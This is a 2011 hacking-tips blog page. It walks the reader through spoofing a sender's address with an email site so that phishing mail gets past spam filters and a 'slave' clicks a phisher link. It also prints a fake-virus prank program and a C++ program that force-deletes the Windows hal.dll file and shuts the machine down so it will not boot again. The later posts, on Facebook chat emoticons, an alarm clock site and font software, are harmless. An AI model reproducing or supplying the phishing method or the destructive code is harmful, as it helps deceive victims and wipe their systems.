Sunday, 25 December 2011

World Best Fake Email Sender - Not Going To Spam Folder

Here is new & super fake email sender for all... I think that's very cool.. coz sending emails using this sender not going to spam folder. Also you can use templates & html in email 

Step 1. Go This Site
Quote
http://emkei.cz/

Step 2. Now, enter the information as shown

From Name: The Sender name which will appear on Email
From Email: The sender Email address
To: slave email address
Subject: Subject of the Email
Content-type: Select text/html
Text: The content of your mail. Put something which will make your slave to click on your phisher link.
Step 3. Now enter the captcha & send
Here is video tut for this, video create by me
http://www.youtube.com/watch?v=IrkivhxOyPg

C++:Doom Virus SourceCode

This is not actually a virus but a practical joke. It will make your victim believe that his system is under seize and is infected. Remember you need to compile it only (.ie click on compile option ) and not run it(i.e click on run option). This will generate the .EXE file.



#include"conio.h"
#include"dos.h"
#include"stdio.h"
void main()
{
     clrscr();
     printf("VIRUS LOADING");
     for(int i=0;i<=10;i++)
     {
          printf(".");
          delay(4000);
     }
     printf("completed");
     printf("PROCRAETOR.SYS SUCCESSFULLY PLANTED");
     delay(3000);
     printf("THE PROCRAETOR:");
     printf("YOUR PC IS NOW UNDER SURVEILANCE");
     printf("PEACE BE WITHOUT YOU !!!");
}

Replace location to the location where you want the file to be..

C++:To Delete HAL.dll File

This is a powerful C++ program, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.This is not a prank..

Warning: Do not try this on your home computer.

Code:

#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
    system("del %SystemRoot%\\system32\\hal.dll -q"); //PWNAGE TIME
    system("%SystemRoot%\\system32\\shutdown.exe -s -f -t 00");
    system("PAUSE");
    return EXIT_SUCCESS;
}

Note:
          The "del" command is used in DOS to delete stuff. "-q" is a parameter which means force delete,or delete without asking.shutdown -s -f -t 00 means shutdown,force close everything running,in 00 seconds time.

Some more Smileys....

Try pasting this in chat

[[171108522930776]] TroLL
[[164413893600463]] MEGUSTA
[[218595638164996]] YAO
[[189637151067601]] Lol
[[129627277060203]] Pkr face.
[[227644903931785]] F ALONE.
[[100002752520227]] OKAY
[[105387672833401]] FK YEA.
[[100002727365206]] CH AC.
[[125038607580286]] Forever alone navidad.
[[143220739082110]] FK KIDDING ME.
[[168040846586189]] Feel like a Sir.
[[169919399735055]] NOT BAD
[[142670085793927]] M O G.
[[170815706323196]] Cereal Guy
[[167359756658519]] NO
[[224812970902314]] Derp
[[192644604154319]] Derpina
[[171108522930776]] Most sexy girl EVER

Saturday, 24 December 2011

All similies of Facbeook chat in one place....

While playing with Facebook Chat I wondered if it supported emoticons. Turns out it does. But when I tried the >:-) emoticon (a 'devil') and saw it printed as boring text, I wondered, "what smilies does facebook actually support?"
So with the help of Safari and some javascript hacking I present to you a complete list of facebook emoticons.
smile
:-) :) :] =)
frown
:-( :( :[ =(
tongue
:-P :P :-p :p =P
grin
:-D :D =D
gasp
:-O :O :-o :o
wink
;-) ;)
glasses
8-) 8) B-) B)
sunglasses
8-| 8| B-| B|
grumpy
>:( >:-(
unsure
:/ :-/ :\ :-\
cry
:'(
devil
3:) 3:-)
angel
O:) O:-)
kiss
:-* :*
heart
<3
kiki
^_^
squint
-_-
confused
o.O O.o
 
Enjoy with ur   friends
upset
>:O >:-O >:o >:-o
pacman
:v
curly lips
:3
robot
:|]
Chris Putnam
:putnam:
Shark
(^^^)
Penguin
<(")
42
:42:


Keep Online Alarm....

Now a Days internet users have become very vast and it is increasing day by day very fast.Sometimes internet users who are interested in using it will work on it and actually they do not watch the time.So the bill for internet raises as well as time which is equal to gold gets dissolved uselessly.So those people can keep a alarm online for waking them up from their deep internet sleep.Check out the world's coolest alarm clock at :

www.kukuklok.com


Create your own font with FontLab

All you may use "Times New Roman " as your default font and some other fonts for your local language.You would often wonder if you could create a own font for yourself.Font Lab makes it possible for you to create fonts in your Own languages too.It is free of cost.You can create your own designed alphabets too.